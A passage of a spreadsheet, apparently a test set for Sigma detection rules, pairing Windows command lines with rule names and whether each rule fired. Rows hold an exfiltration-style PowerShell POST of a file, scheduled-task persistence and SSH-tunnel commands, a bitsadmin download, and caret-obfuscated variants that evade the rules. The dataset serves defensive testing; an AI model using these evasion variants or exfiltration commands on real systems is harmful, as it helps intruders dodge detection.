        </is>
      </c>
      <c r="C4770" s="44" t="inlineStr">
        <is>
          <t>Potential Data Exfiltration Activity Via CommandLine Tools</t>
        </is>
      </c>
      <c r="D4770" s="44" t="inlineStr">
        <is>
          <t>7d1aaf3d-4304-425c-b7c3-162055e0b3ab</t>
        </is>
      </c>
      <c r="E4770" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$content = Get-Content C:\Temp\test.txt; Invoke-WebRequest -Method 'POST' -Uri http://127.0.0.1 -Body $content"</t>
        </is>
      </c>
      <c r="F4770" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4770" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4770" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4770" s="44" t="inlineStr">
        <is>
          <t>Suspicious Invoke-WebRequest Execution (5e3cc4d8-3e68-43db-8656-eaaeefdec9cc); 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4770" s="44" t="n"/>
      <c r="K4770" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4771" ht="15.75" customHeight="1" s="42">
      <c r="A4771" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4771" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_data_exfiltration_via_cli</t>
        </is>
      </c>
      <c r="C4771" s="44" t="inlineStr">
        <is>
          <t>Potential Data Exfiltration Activity Via CommandLine Tools</t>
        </is>
      </c>
      <c r="D4771" s="44" t="inlineStr">
        <is>
          <t>7d1aaf3d-4304-425c-b7c3-162055e0b3ab</t>
        </is>
      </c>
      <c r="E4771" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$content = Get-Content C:\Temp\test.txt; Invoke-WebRequest -Uri http://127.0.0.1 -Method:POST -Body:$content"</t>
        </is>
      </c>
      <c r="F4771" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4771" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4771" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4771" s="44" t="inlineStr">
        <is>
          <t>Suspicious Invoke-WebRequest Execution (5e3cc4d8-3e68-43db-8656-eaaeefdec9cc); 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4771" s="44" t="n"/>
      <c r="K4771" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4772" ht="15.75" customHeight="1" s="42">
      <c r="A4772" s="44" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B4772" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_advancedrun</t>
        </is>
      </c>
      <c r="C4772" s="44" t="inlineStr">
        <is>
          <t>PUA - AdvancedRun Execution</t>
        </is>
      </c>
      <c r="D4772" s="44" t="inlineStr">
        <is>
          <t>d2b749ee-4225-417e-b20e-a8d2193cbb84</t>
        </is>
      </c>
      <c r="E4772" s="44" t="inlineStr">
        <is>
          <t>AdvancedRun.exe -EXEFilename C:\\Program Files\\MyApp.exe -Run -WindowState 0 -RunAs -CommandLine cmd /c echo Hello</t>
        </is>
      </c>
      <c r="F4772" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4772" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4772" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4772" s="44" t="n"/>
      <c r="J4772" s="44" t="n"/>
      <c r="K4772" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4773" ht="15.75" customHeight="1" s="42">
      <c r="A4773" s="44" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B4773" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_advancedrun</t>
        </is>
      </c>
      <c r="C4773" s="44" t="inlineStr">
        <is>
          <t>PUA - AdvancedRun Execution</t>
        </is>
      </c>
      <c r="D4773" s="44" t="inlineStr">
        <is>
          <t>d2b749ee-4225-417e-b20e-a8d2193cbb84</t>
        </is>
      </c>
      <c r="E4773" s="44" t="inlineStr">
        <is>
          <t>AdvancedRun.exe /EXEFilename C:\Program Files\MyApp.exe /Run /WindowState0 /RunAs /CommandLine cmd /c echo Hello</t>
        </is>
      </c>
      <c r="F4773" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4773" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4773" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4773" s="44" t="n"/>
      <c r="J4773" s="44" t="n"/>
      <c r="K4773" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4774" ht="15.75" customHeight="1" s="42">
      <c r="A4774" s="44" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B4774" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_advancedrun</t>
        </is>
      </c>
      <c r="C4774" s="44" t="inlineStr">
        <is>
          <t>PUA - AdvancedRun Execution</t>
        </is>
      </c>
      <c r="D4774" s="44" t="inlineStr">
        <is>
          <t>d2b749ee-4225-417e-b20e-a8d2193cbb84</t>
        </is>
      </c>
      <c r="E4774" s="44" t="inlineStr">
        <is>
          <t>AdvancedRun.exe /EXEFilename %PROGRAMFILES%\MyApp.exe /Run /WindowState 0 /RunAs /CommandLine cmd /c echo Hello</t>
        </is>
      </c>
      <c r="F4774" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4774" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4774" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4774" s="44" t="n"/>
      <c r="J4774" s="44" t="n"/>
      <c r="K4774" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4775" ht="15.75" customHeight="1" s="42">
      <c r="A4775" s="44" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B4775" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_creation</t>
        </is>
      </c>
      <c r="C4775" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE</t>
        </is>
      </c>
      <c r="D4775" s="44" t="inlineStr">
        <is>
          <t>92626ddd-662c-49e3-ac59-f6535f12d189</t>
        </is>
      </c>
      <c r="E4775" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe  /create /tn "BenignTask1" /sc once /tr C:\windows\system32\cmd.exe /st 20:10</t>
        </is>
      </c>
      <c r="F4775" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4775" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4775" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4775" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types (24c8392b-aa3c-46b7-a545-43f71657fe98); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J4775" s="44" t="n"/>
      <c r="K4775" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4776" ht="15.75" customHeight="1" s="42">
      <c r="A4776" s="44" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B4776" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_creation</t>
        </is>
      </c>
      <c r="C4776" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE</t>
        </is>
      </c>
      <c r="D4776" s="44" t="inlineStr">
        <is>
          <t>92626ddd-662c-49e3-ac59-f6535f12d189</t>
        </is>
      </c>
      <c r="E4776" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe "/create" /tn "BenignTask2" /sc once /tr C:\windows\system32\cmd.exe /st 20:10</t>
        </is>
      </c>
      <c r="F4776" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4776" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4776" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4776" s="44" t="n"/>
      <c r="J4776" s="44" t="n"/>
      <c r="K4776" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4777" ht="15.75" customHeight="1" s="42">
      <c r="A4777" s="44" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B4777" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_creation</t>
        </is>
      </c>
      <c r="C4777" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE</t>
        </is>
      </c>
      <c r="D4777" s="44" t="inlineStr">
        <is>
          <t>92626ddd-662c-49e3-ac59-f6535f12d189</t>
        </is>
      </c>
      <c r="E4777" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c schtasks.exe /cr^eate /tn "BenignTask3" /sc once /tr C:\windows\system32\cmd.exe /st 20:10</t>
        </is>
      </c>
      <c r="F4777" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4777" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4777" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4777" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types (24c8392b-aa3c-46b7-a545-43f71657fe98); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J4777" s="44" t="n"/>
      <c r="K4777" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4778" ht="15.75" customHeight="1" s="42">
      <c r="A4778" s="44" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B4778" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_creation_temp_folder</t>
        </is>
      </c>
      <c r="C4778" s="44" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation Involving Temp Folder</t>
        </is>
      </c>
      <c r="D4778" s="44" t="inlineStr">
        <is>
          <t>39019a4e-317f-4ce3-ae63-309a8c6b53c5</t>
        </is>
      </c>
      <c r="E4778" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe "/create" /tn "TestTask1" /tr "C:\Windows\Temp\test.txt" /sc "once" /st 12:00</t>
        </is>
      </c>
      <c r="F4778" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4778" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4778" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4778" s="44" t="n"/>
      <c r="J4778" s="44" t="n"/>
      <c r="K4778" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4779" ht="15.75" customHeight="1" s="42">
      <c r="A4779" s="44" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B4779" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_creation_temp_folder</t>
        </is>
      </c>
      <c r="C4779" s="44" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation Involving Temp Folder</t>
        </is>
      </c>
      <c r="D4779" s="44" t="inlineStr">
        <is>
          <t>39019a4e-317f-4ce3-ae63-309a8c6b53c5</t>
        </is>
      </c>
      <c r="E4779" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c schtasks.exe /cr^eate /tn "TestTask1" /tr "C:\Windows\Temp\test.txt" /sc on^ce /st 12:00</t>
        </is>
      </c>
      <c r="F4779" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4779" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4779" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4779" s="44" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation Involving Temp Folder (39019a4e-317f-4ce3-ae63-309a8c6b53c5); Suspicious Schtasks Schedule Types (24c8392b-aa3c-46b7-a545-43f71657fe98); Schedule Task Creation From Env Variable Or Potentially Suspicious Path Via Schtasks.EXE (81325ce1-be01-4250-944f-b4789644556f); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J4779" s="44" t="n"/>
      <c r="K4779" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4780" ht="15.75" customHeight="1" s="42">
      <c r="A4780" s="44" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B4780" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_creation_temp_folder</t>
        </is>
      </c>
      <c r="C4780" s="44" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation Involving Temp Folder</t>
        </is>
      </c>
      <c r="D4780" s="44" t="inlineStr">
        <is>
          <t>39019a4e-317f-4ce3-ae63-309a8c6b53c5</t>
        </is>
      </c>
      <c r="E4780" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /create /tn "TestTask1" /tr "C:/Windows/Temp/test.txt" /sc once /st 12:00</t>
        </is>
      </c>
      <c r="F4780" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4780" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4780" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4780" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types (24c8392b-aa3c-46b7-a545-43f71657fe98); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J4780" s="44" t="n"/>
      <c r="K4780" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4781" ht="15.75" customHeight="1" s="42">
      <c r="A4781" s="44" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B4781" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_env_folder</t>
        </is>
      </c>
      <c r="C4781" s="44" t="inlineStr">
        <is>
          <t>Schedule Task Creation From Env Variable Or Potentially Suspicious Path Via Schtasks.EXE</t>
        </is>
      </c>
      <c r="D4781" s="44" t="inlineStr">
        <is>
          <t>81325ce1-be01-4250-944f-b4789644556f</t>
        </is>
      </c>
      <c r="E4781" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe "/create" /tn "TestTask1" /tr "C:\Perflogs\test.txt" /sc daily</t>
        </is>
      </c>
      <c r="F4781" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4781" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4781" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4781" s="44" t="n"/>
      <c r="J4781" s="44" t="n"/>
      <c r="K4781" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4782" ht="15.75" customHeight="1" s="42">
      <c r="A4782" s="44" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B4782" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_env_folder</t>
        </is>
      </c>
      <c r="C4782" s="44" t="inlineStr">
        <is>
          <t>Schedule Task Creation From Env Variable Or Potentially Suspicious Path Via Schtasks.EXE</t>
        </is>
      </c>
      <c r="D4782" s="44" t="inlineStr">
        <is>
          <t>81325ce1-be01-4250-944f-b4789644556f</t>
        </is>
      </c>
      <c r="E4782" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /create /tn "TestTask1" /tr "C:/Perflogs/test.txt" /sc daily</t>
        </is>
      </c>
      <c r="F4782" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4782" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4782" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4782" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J4782" s="44" t="n"/>
      <c r="K4782" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4783" ht="15.75" customHeight="1" s="42">
      <c r="A4783" s="44" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B4783" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_env_folder</t>
        </is>
      </c>
      <c r="C4783" s="44" t="inlineStr">
        <is>
          <t>Schedule Task Creation From Env Variable Or Potentially Suspicious Path Via Schtasks.EXE</t>
        </is>
      </c>
      <c r="D4783" s="44" t="inlineStr">
        <is>
          <t>81325ce1-be01-4250-944f-b4789644556f</t>
        </is>
      </c>
      <c r="E4783" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c schtasks.exe /cr^eate /tn "TestTask1" /tr "C:\Perflogs\test.txt" /sc daily</t>
        </is>
      </c>
      <c r="F4783" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4783" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4783" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4783" s="44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4783" s="44" t="n"/>
      <c r="K4783" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4784" ht="15.75" customHeight="1" s="42">
      <c r="A4784" s="44" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B4784" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_openssh_tunnelling</t>
        </is>
      </c>
      <c r="C4784" s="44" t="inlineStr">
        <is>
          <t>Potential SSH Tunnel Persistence Install Using A Scheduled Task</t>
        </is>
      </c>
      <c r="D4784" s="44" t="inlineStr">
        <is>
          <t>2daa93a0-a5fb-41c5-8cd8-3c11294bfd1f</t>
        </is>
      </c>
      <c r="E4784" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe -create /tn "TestTask1" /tr "C:\Windows\System32\OpenSSH\ssh.exe -i C:\Temp\test.txt user@192.0.2.10" /sc daily</t>
        </is>
      </c>
      <c r="F4784" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4784" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4784" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4784" s="44" t="n"/>
      <c r="J4784" s="44" t="n"/>
      <c r="K4784" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4785" ht="15.75" customHeight="1" s="42">
      <c r="A4785" s="44" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B4785" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_openssh_tunnelling</t>
        </is>
      </c>
      <c r="C4785" s="44" t="inlineStr">
        <is>
          <t>Potential SSH Tunnel Persistence Install Using A Scheduled Task</t>
        </is>
      </c>
      <c r="D4785" s="44" t="inlineStr">
        <is>
          <t>2daa93a0-a5fb-41c5-8cd8-3c11294bfd1f</t>
        </is>
      </c>
      <c r="E4785" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe "/create" /tn "TestTask1" /tr "C:\Windows\System32\OpenSSH\ssh.exe -i C:\Temp\test.txt user@192.0.2.10" /sc daily</t>
        </is>
      </c>
      <c r="F4785" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4785" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4785" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4785" s="44" t="n"/>
      <c r="J4785" s="44" t="n"/>
      <c r="K4785" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4786" ht="15.75" customHeight="1" s="42">
      <c r="A4786" s="44" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B4786" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_openssh_tunnelling</t>
        </is>
      </c>
      <c r="C4786" s="44" t="inlineStr">
        <is>
          <t>Potential SSH Tunnel Persistence Install Using A Scheduled Task</t>
        </is>
      </c>
      <c r="D4786" s="44" t="inlineStr">
        <is>
          <t>2daa93a0-a5fb-41c5-8cd8-3c11294bfd1f</t>
        </is>
      </c>
      <c r="E4786" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /create /tn "TestTask1" /tr "C:\Windows\System32\OpenSSH\ssh -i C:\Temp\test.txt user@192.0.2.10" /sc daily</t>
        </is>
      </c>
      <c r="F4786" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4786" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4786" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4786" s="44" t="n"/>
      <c r="J4786" s="44" t="n"/>
      <c r="K4786" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4787" ht="15.75" customHeight="1" s="42">
      <c r="A4787" s="44" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B4787" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_openssh_tunnelling</t>
        </is>
      </c>
      <c r="C4787" s="44" t="inlineStr">
        <is>
          <t>Potential SSH Tunnel Persistence Install Using A Scheduled Task</t>
        </is>
      </c>
      <c r="D4787" s="44" t="inlineStr">
        <is>
          <t>2daa93a0-a5fb-41c5-8cd8-3c11294bfd1f</t>
        </is>
      </c>
      <c r="E4787" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c schtasks.exe /cr^eate /tn "TestTask1" /tr "C:\Windows\System32\OpenSSH\ssh.exe -i C:\Temp\test.txt user@192.0.2.10" /sc daily</t>
        </is>
      </c>
      <c r="F4787" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4787" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4787" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4787" s="44" t="inlineStr">
        <is>
          <t>Potential SSH Tunnel Persistence Install Using A Scheduled Task (2daa93a0-a5fb-41c5-8cd8-3c11294bfd1f); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J4787" s="44" t="n"/>
      <c r="K4787" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4788" ht="15.75" customHeight="1" s="42">
      <c r="A4788" s="44" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B4788" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_type</t>
        </is>
      </c>
      <c r="C4788" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types</t>
        </is>
      </c>
      <c r="D4788" s="44" t="inlineStr">
        <is>
          <t>24c8392b-aa3c-46b7-a545-43f71657fe98</t>
        </is>
      </c>
      <c r="E4788" s="44" t="inlineStr">
        <is>
          <t>schtasks /create /tn "T1053_005_OnLogon" /sc	onlogon	/tr "cmd.exe /c calc.exe"</t>
        </is>
      </c>
      <c r="F4788" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4788" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4788" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4788" s="44" t="n"/>
      <c r="J4788" s="44" t="n"/>
      <c r="K4788" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4789" ht="15.75" customHeight="1" s="42">
      <c r="A4789" s="44" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B4789" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_type</t>
        </is>
      </c>
      <c r="C4789" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types</t>
        </is>
      </c>
      <c r="D4789" s="44" t="inlineStr">
        <is>
          <t>24c8392b-aa3c-46b7-a545-43f71657fe98</t>
        </is>
      </c>
      <c r="E4789" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c schtasks /create /tn "T1053_005_OnLogon" /sc o^nl^og^on /tr "cmd.exe /c calc.exe"</t>
        </is>
      </c>
      <c r="F4789" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4789" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4789" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4789" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types (24c8392b-aa3c-46b7-a545-43f71657fe98); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J4789" s="44" t="n"/>
      <c r="K4789" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4790" ht="15.75" customHeight="1" s="42">
      <c r="A4790" s="44" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B4790" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_type</t>
        </is>
      </c>
      <c r="C4790" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types</t>
        </is>
      </c>
      <c r="D4790" s="44" t="inlineStr">
        <is>
          <t>24c8392b-aa3c-46b7-a545-43f71657fe98</t>
        </is>
      </c>
      <c r="E4790" s="44" t="inlineStr">
        <is>
          <t>schtasks -create -tn "T1053_005_OnLogon" -sc onlogon/ -tr "cmd.exe /c calc.exe"</t>
        </is>
      </c>
      <c r="F4790" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4790" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4790" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4790" s="44" t="n"/>
      <c r="J4790" s="44" t="n"/>
      <c r="K4790" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4791" ht="15.75" customHeight="1" s="42">
      <c r="A4791" s="44" t="inlineStr">
        <is>
          <t>t1204</t>
        </is>
      </c>
      <c r="B4791" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_arbitrary_shell_execution_via_settingcontent</t>
        </is>
      </c>
      <c r="C4791" s="44" t="inlineStr">
        <is>
          <t>Arbitrary Shell Command Execution Via Settingcontent-Ms</t>
        </is>
      </c>
      <c r="D4791" s="44" t="inlineStr">
        <is>
          <t>24de4f3b-804c-4165-b442-5a06a2302c7e</t>
        </is>
      </c>
      <c r="E4791" s="44" t="inlineStr">
        <is>
          <t>"C:\Windows\explorer.exe" "C:\Users\Public\SettingsShortcut.SettingContent-ms" "immersivecontrolpanel"</t>
        </is>
      </c>
      <c r="F4791" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4791" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4791" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4791" s="44" t="n"/>
      <c r="J4791" s="44" t="n"/>
      <c r="K4791" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4792" ht="15.75" customHeight="1" s="42">
      <c r="A4792" s="44" t="inlineStr">
        <is>
          <t>t1204</t>
        </is>
      </c>
      <c r="B4792" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_arbitrary_shell_execution_via_settingcontent</t>
        </is>
      </c>
      <c r="C4792" s="44" t="inlineStr">
        <is>
          <t>Arbitrary Shell Command Execution Via Settingcontent-Ms</t>
        </is>
      </c>
      <c r="D4792" s="44" t="inlineStr">
        <is>
          <t>24de4f3b-804c-4165-b442-5a06a2302c7e</t>
        </is>
      </c>
      <c r="E4792" s="44" t="inlineStr">
        <is>
          <t>"C:\Windows\explorer.exe" "C:\Users\Public\SettingsShortcut.SettingContent""-ms"</t>
        </is>
      </c>
      <c r="F4792" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4792" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4792" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4792" s="44" t="n"/>
      <c r="J4792" s="44" t="n"/>
      <c r="K4792" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4793" ht="15.75" customHeight="1" s="42">
      <c r="A4793" s="44" t="inlineStr">
        <is>
          <t>t1204</t>
        </is>
      </c>
      <c r="B4793" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_arbitrary_shell_execution_via_settingcontent</t>
        </is>
      </c>
      <c r="C4793" s="44" t="inlineStr">
        <is>
          <t>Arbitrary Shell Command Execution Via Settingcontent-Ms</t>
        </is>
      </c>
      <c r="D4793" s="44" t="inlineStr">
        <is>
          <t>24de4f3b-804c-4165-b442-5a06a2302c7e</t>
        </is>
      </c>
      <c r="E4793" s="44" t="inlineStr">
        <is>
          <t>"C:\Windows\explorer.exe" "C:/Users/Public/SettingsShortcut.SettingContent-ms"</t>
        </is>
      </c>
      <c r="F4793" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4793" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4793" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4793" s="44" t="n"/>
      <c r="J4793" s="44" t="n"/>
      <c r="K4793" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4794" ht="15.75" customHeight="1" s="42">
      <c r="A4794" s="44" t="inlineStr">
        <is>
          <t>t1564</t>
        </is>
      </c>
      <c r="B4794" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_execution_from_public_folder_as_parent</t>
        </is>
      </c>
      <c r="C4794" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious Execution From Parent Process In Public Folder</t>
        </is>
      </c>
      <c r="D4794" s="44" t="inlineStr">
        <is>
          <t>69bd9b97-2be2-41b6-9816-fb08757a4d1a</t>
        </is>
      </c>
      <c r="E4794" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\bi^tsadmin.exe /transfer TestJob /download /priority foreground http://example.com/test.txt C:\Temp\test.txt</t>
        </is>
      </c>
      <c r="F4794" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4794" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4794" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4794" s="44" t="inlineStr">
        <is>
          <t>File With Suspicious Extension Downloaded Via Bitsadmin (5b80a791-ad9b-4b75-bcc1-ad4e1e89c200); File Download Via Bitsadmin To A Suspicious Target Folder (2ddef153-167b-4e89-86b6-757a9e65dcac); File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede)</t>
        </is>
      </c>
      <c r="J4794" s="44" t="n"/>
      <c r="K4794" s="44" t="b">
        <v>0</v>
      </c>
    </row>
